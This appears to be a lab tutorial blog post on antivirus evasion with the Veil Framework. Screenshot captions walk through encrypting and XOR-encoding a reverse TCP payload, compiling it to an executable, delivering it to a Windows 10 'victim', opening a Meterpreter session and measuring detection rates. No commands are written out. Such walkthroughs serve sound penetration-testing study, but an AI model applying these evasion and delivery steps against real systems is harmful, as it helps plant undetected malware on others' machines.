ANTIVIRUS EVASION / Veil Framework (IV): Evasion -> Ordnance -> ARC / Pyherion (encryption) -> XOR (encoding)
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2bg2-zFXO034Q8iYfrDI6vuB7haHLH9kfQaEk-yC9XACcilRrMRfhtx3YHvMpK4GKTloJ8svRt1p3sEoxuBDcmRdl7cXbr5LeBBbU3Bx54vpDxDQWOSDTpFBpx7_DStyc5yK1n6kitE-E/s1600/screenshot.1.jpg)
- The goal of this exercise is to achieve a reasonable good rate of Anti Virus evasion using the Veil Framework adding up encryption (ARC / PYHERION) plus encoding (XOR)
1 - Veil-Evasion encryption with ARC and Pyherion
- Launching the program:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp256boIYMY9M8D_xugomrYCchrG4bo2ZmhTvXn1A-T3CMHwv0m2Rxhf7mZB9WNqpQEGnPskFNVVg7O2Y5bOK3zeD-MW_8Qst3i88LTyGZ1Ut-VeIYbu2tJHcbe1JhnJHhTxxIMTQXsFQ2/s400/screenshot.2.jpg)
- Listing the available tools:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1IMTE2njXTP_CyFT4v1s0VLnL3Nz0kuwsYAOITARKhTG8p0eXcriVbWiIGItMNyQ394Y3aZ5HuUs18J5L3zKTK5DSQhJnoi8g5L0U6NYdDNVG0nKo8DKVMQnDWLoerZePUjXgSMxJO31b/s1600/screenshot.3.jpg)
- At first, using Evasion:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioMQujn0Gh9ssNiccDIAGRsvAvZCXrekY2P4kCrfiAyS8ipulapH-Vi0-pRhC8OpkmISOJeZMSjmvCa0tg_PjOTZYwKeETW6LynoEWIu9SAa4QeCvvXeNqaOWp_AVoDBrtPzMX0KhCZpsc/s400/screenshot.4.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5delBMODsBv3OgUcfxigCkTv9GiUDq25JTVb93xOfvbWb1P_BxpWDpz2zJLvKZuoXMPVCSvoSgY6ZJcT6KNQ_vDeGdX_8IhyphenhyphenQT1sNOfO_zVmTSehfr9HO4rfKBTKUZJg8S_3JthTbHmQA/s1600/screenshot.5.jpg)
- Listing available payloads, let's take number 30) that uses the encryption ARC algorithm:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieuSCQEjVNZk-e_nNFjOq3oGDj_M_2rW4KwLEgxzXzhRt0ZrbS0rIV-TtOF3byV2Tjsz1ErPqKmsr5UxQ7aIpGY9Gk-fPRpfWM-wnjv8_9G9gc0t2xM2eGKVAFm8REqXoCZcDALBDTpHG1/s1600/screenshot.6.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqNsCUZeehANzVxx-uFgD6c2dc9lEC1BinjnkW2bErZrk8sTBn6neoWXKRYp54VDNnCCNuDuPUG9wpyoFSoDIrK1sRMGIw1HIwfTrmiSIEx2lTQngfy4llZM1Y7UaColvGinT1VOj1EygI/s1600/screenshot.8.jpg)
- Using the payload number 30):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ86u_K-XhKsvw_J1dgC4y6YN_Qskei80u8viSexEfnq9tuN6SI4jmVZbczYbUQ9tMkZ53kKsmakd86WI3RK9P_ngwtRrh2qvh684yTrgicKO1AD0pBSCdEsn6WSOc1koCWe6hnFf7HVHG/s1600/screenshot.9.jpg)
- Setting option USE_PYHERION (encrypter) to Yes:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI0AnB8n3GX0gOurnBH9V1JGiXGpdaJ594LraDYd8Ei2vgfr7pEhob2bx8ODwy2FFUK5OtafItcIYQZQeDLneRj9Efg2WUaKLGk7xQVOUudrfScfsxD39HyHjB4c63LjpJAhUUu1CPZVK3/s1600/screenshot.10.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNSMEIEPE0txN7a_XlkMntiLY3QTfUYYUOfmuRJmMq6JsbPGpG52d76eJDZ75NW8LnTSJoKsS9t67Ejk3RcVlz8ZyeeeU4vSfATgfAVq_bd3_du_lfkUH9UUuZLhUaXdL-0Zr3nmQNNvK2/s1600/screenshot.11.jpg)
2 - Generating the shellcode with Ordnance and encoding with XOR
- Generating the payload:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRvMngq9TzQVAJSlf8LEJUQ1G9_p_FYsZbjEz5s_P3DPr8s6_qz8_u59utq6B8tgyABb6RhfMxippLvhWHWwVj0H-wCnSe8p1I9VSh2sYIAV7VDExWs92PPAO20hXoVwf4_4hDR6MM0mVt/s1600/screenshot.12.jpg)
- Taking Ordnance as default:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBzYUVJSz6v-1g734WEO3cT77HTeh3XoUGz99MXCLsjAAU_xtWHRDKM6mvHz9DxLWhTg003LfUEsj7M5zAev2lu7IWmM_AUqSJWUb8b46SplMrnanTmzAb6LFOYIJpSAM6mJOGR7enBztb/s1600/screenshot.13.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW0Ihqgz8x2WZqezvqfEoBFccF_V4xSwHNEQVVB_qJW7KJH8SGoR3p0uNMwOqtO6Wb9JCpeVcUPVnHdqSfTsnLzUSHnv7ftNEYiYP5QSJONcQeDS01luJM1ql8UNmh5mPcTxrSaEPPAtst/s1600/screenshot.14.jpg)
- Listing Ordnance payloads:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnwRrWLdJU3MkhQu-5cK_PljI_ul407jdZ9omxcTkMiuDr9hT3gsXMeSsaqvIEU2EpGwk0B2kElOg5lfmSdvfXu8avTcS8eHdwuXF59gW9dfMRobwQrVJx6auyY-Jla8nYGjis30ynB9lI/s1600/screenshot.15.jpg)
- Let's take rev_tcp_all_ports:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Ay-l-IrsYsfDST3HtiDta3AtRjki4hJBh-3SzF_MXlwaFUmPmLsNCJtnCDWaL9-0EsPO8ic30SL1D4Iq3-2RRIlpGcvYk4yAdsPuM31xoCrhCposekTMyFZax-7hgBUImmw3AAa6Wq0W/s1600/screenshot.16.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjavlwWfMmHJJDbHS4TExSyt-XP2cU7ZJ9-50zdopizaREJe9OJdQeAK5M_RAXIMNFpscTV4rFeh04YdKqeSgjNQTv6u3NabCOqFl9v42l22OE6MEx7F3iPN9CdpsShFgM71NwlX02xAenV/s1600/screenshot.17.jpg)
- Options for this payload: first of all setting BadChars to \x00 (NULL character) and \x0A (Carriage Return):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDF-cciOcc7IwgIXF9Y7ZThhufrFNYVe-Wzbbubyoa5HsVIm7OHseiIcRRaK0fNAGR4TjJJEbStsXVV6X3cntudkR4u4kbp6y50oOHR5rs9N6QhpksR4Fq_176lWUvvwYnU5uHIeggO_3i/s1600/screenshot.18.jpg)
- Encoder to XOR:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEignXXH39HGiS2GBntkiojX31FbPpmwm5rp3SfyLOdNnmzJGTojaatGw4yFXsnEI1r8S3nnHFqXh_qRKOi3RZjmCycTymx5LxICZYGkl0rKbEwNNsxOMeV1arQCqJSPKHgACauW_lAVfYpL/s1600/screenshot.19.jpg)
- LHOST to Kali's IP:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigCsDNiD3rK6oVhhv1upc3hoZaUsJcSs1EV5nMXBdknexsaQtWeLA-D62fW7Jv9ZWaq2Ozp5tiCqQ8A29knZI_xYdktK06ShAMWwVxMLBo8WjpbB2m62nu75HSyVRg5wg7B0dx0X2M64-3/s1600/screenshot.20.jpg)
- LPORT to Kali's port 1111:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh38XMCrgtvOBI9gD1Oe-hEBT_08q5JysnfgJbkHUVQhKxbB0bgb6pFDycYptxDgAcamOABMvfZoaHWiwH9zsPb_bo9Jb7879sdIv3KHBgxOELIgPlYwHUqkdnLlJs5jdCaNgGlmnMPTWz9/s1600/screenshot.21.jpg)
- Generating the shellcode:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1vR2LzdS5S7qeApTAik6vfiGWdDh-KoSxb9hlUG0Tf49ZaykIqf0AbaitYSXlX-KxCeFz9ltRAqLVnm8Xxtsn_1na183aQ3KOW-XY10x4RliX1BaidC7oWNjU3RPjaL2kcCodukDTW5_n/s1600/screenshot.23.jpg)
- Entering the name test3:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcM3jQ_Hb0eYLimM9cclfZlRw0SZ2R2HlEgLkQ4QySF97_13DjRdRjyBDtmrEassXZ1CMgKS58MY6DZuUCWTqAfkPKEkXv3leli-KkZSmMLfUVSLdFP2PsmEThpAE6s19_-346pIx7ZyeC/s1600/screenshot.24.jpg)
- Using Pyinstaller to generate the .exe file:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5svgTV1Wxlhyphenhyphen8mehEry9y1Usl2R3uerQjs3wCoiG4J3giyq3V_lmVLlCtEzttFrpCUJ_LDqJX0LWBEu7KbAPKgYrYs-NccGqbtAH560ME-k5xFJQxsGbX1FBSg5yFCT231Mt10JFyI7q4/s1600/screenshot.25.jpg)
3 - Files created by Veil-Evasion
- The Veil files are created and stored in these folders:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFhfoULo1R9LsghNz-6p0gJKBm5E_sBr9vZmpU98ak-e88AGT7nN8CPfR1TVyDBxuUmE6peedbOxXyUw6GjuGQGKSa_InKgJ7FbagWc2LNXcH4exS5Gocl52YI6qd-VUzVdsGAa4clsnev/s1600/screenshot.26.jpg)
- Going to /usr/share/veil-output:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirTYpRKVMkk265DcD6SBkpgRUC-N5yADAqOJF1AIR6rZ6G0NRCbJdd68Bszd4ybL2hQmrIPRTGCmZ7y1KRMK8bv66EW_2LoEClOuBDo06nClKd8h7wNpsMvXK-N7_ZV37MV6hkxzGjuNrl/s1600/screenshot.28.jpg)
- The folders compiled, handlers and source contain the generated Veil files:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYGucz6GVmhqogi7jqcCSGjYRSHgo8arWff6VEeu2Zm7E5dPRKbeDK-o8pVsEIdJTBAPjD3qeDywD5WquvRlYh3LKBRTomvSFeZYQpQEE7brg9hykFIN4svgJEl4uoS5_PXeO84RSVE_SV/s1600/screenshot.29.jpg)
- The source file test3.py is encrypted, as expected:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja1HOVrM721VGTZieyXXCpZnr5U-MtYB5QE-08S47V0SaceGRyfPI_x0pr17C-cF4ikCvqfMueoiPfXQs9QJHiEsGc7aF7MgxjniRfiT4ggflkoPp_KIiOpRB0vEjYeFN-x2eh1mPWhzdJ/s1600/screenshot.35.jpg)
4 - Transferring the .exe file to Windows 10
- The folder compiled holds the executable test3.exe, to be transferred to the victim Windows 10:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoFROFEdoeRsPB4vb85qw2fge0inxKO_SSbd_7o1V-PT2xnPiqjFvxkmC4EnemFNAakT4uoldxhy9DqHoI7m1bRUFx0JhgA4OjKSfdFnWo8oqc9qA9hOIrgHpdCR7YbVheAyE9nDbWpXPG/s1600/screenshot.36.jpg)
- Setting a simple HTTP server:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj39eA8qItLJL41wuXWADwdo7m4RwePGyvtsBfYkcYforZA6MBqq18PZ4ekZYiVfVFEbYZeWEMgIpzyDb1_i5NQRh3yxzk5XoGdSq34YJH7lx2EhlF1PWic6XrrqwR_UChogS5CWItmGJAW/s1600/screenshot.39.jpg)
- Downloading the executable test3.exe to Windows 10:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-W5g1otrYp_U3WbqgC3cNMFcWGAXzkDHYSLvceKb-UtDhyphenhyphenWq1U2xJdF0iJSFopp-2S2HQOk1zhtOQZYD9kj2jfKDWbUbol1dEHDSZoWcPWDd_qA-p6uNNXloZdQNvMxwT4JxUF6JBzRfe/s1600/screenshot.40.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvn2w2H0cYFoNEXCl2mHt9F6kEtkhpTQ1BgBI6BwC_MRONARC1uuvfX7ad9oNw9_jbm7yIG_u8ur-UpvC2dHMMMBv8QB9uwnpwNqV6qXIzFkPVH9afdLACTG3_lkXEX8oyksl3Yw3Hsrtq/s1600/screenshot.41.jpg)
5 - Getting a Meterpreter session with Metasploit processing .rc reference file
- The folder handlers holds the file test3.rc that can be used directly as a reference by Metasploit:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJtzzcMtVazo_y67zH1Ski2TW6yeuphV151WNeX8oYhz7ArmoSw0tIygJteIVAuHJGXeNrkVGyGYqvdpuDvRuR6FnL1DnFaJMD4LwBXIGEQKcLPaIqrjA7fa9tXJ7sJg6zYqvA27WI9SSS/s1600/screenshot.42.jpg)
- Processing test3.rc from msfconsole:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg39c2q7sStK2ig_tBrLSiRDbRcaqEwd1w5n1h8pI6j-VZnlOVwxK-4QLFWBoJTAR9ouXhgswr0ExI_u-h8KOGS-OxlBPYnxkQ7rS1giyOj4NiQsF04VwuLnjmOCmEIaqQeBT3615LkLUca/s1600/screenshot.43.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8XdzyHv8qzh8zgLhDc_iZgzTqRGAX9ZG26u1qgfBb7-lPOcsE17FpF1ney8Ke4m5ISDSuUWcEhDDKqWf6fUOBiZACJhqfVdRKcVySEgy7vmeCOWVDBy5sXGzjTIenmrACFV_hg1thEbVr/s1600/screenshot.44.jpg)
- Executing test3.exe in Windows 10:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3TlPxYgUkpEN-aA875Oox7_pd7w6jwj4yrLR7KEMkcTg9x5Ka-K2nCUw8C3DRbq2kbGF7jKOcJZ9UMyi3x2aYP8NaDdY4J_j4jP27vGHyp11rTz6lw3uctiWJZJtlzHNzEZgZbrtUjwUB/s400/screenshot.48.jpg)
- A meterpreter session is succesfully created:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK6mUy3PuOCMBhVy5lLbz4IMXpFPX5Svf5a_O1bfU-jcuaMIDg0DzbHVQYU-vyVAKcG8R4nk-18WES8-Dtp-fKLXdYIrxwW25MDxCybLcKyUXdoGMECE5RFMftiQ1aUTZPLbsyhNSWB2Mm/s1600/screenshot.50.jpg)
6 - Checking the Anti Virus evasion rate
- Checking test3.exe against Virus Total, a rate of 56% of evasion is achieved:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEa8jl4FWx6jXnNfggQ0ft9y45hLkbxSzkqcf4yQ4RUsI23tYq0eq2Nk7SFGeEj-OqxooTnZdliD8N3rKsR4S1Hw4_s-tXmdvi4xjrPTUVof8Z7gX9wmjplz8KUhqVwEpqBdCzR9omnmup/s1600/screenshot.46.jpg)
- Checking test3.exe against NoDistribute, a rate of 58.8% of evasion is achieved:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIw_o3JBgAFM-CUVJODQ3LmYtBXcX8Oa-QLb9qrCme_m2zhzt7bMlLT8LiDiHSiHt_ZbmBto7WFBgZLV4cTD_DsbjzghAVaKk6StT7UgmqU5dm_msAVrQq3KKlMqlLPSYsvMryMkPx86bv/s1600/screenshot.47.jpg)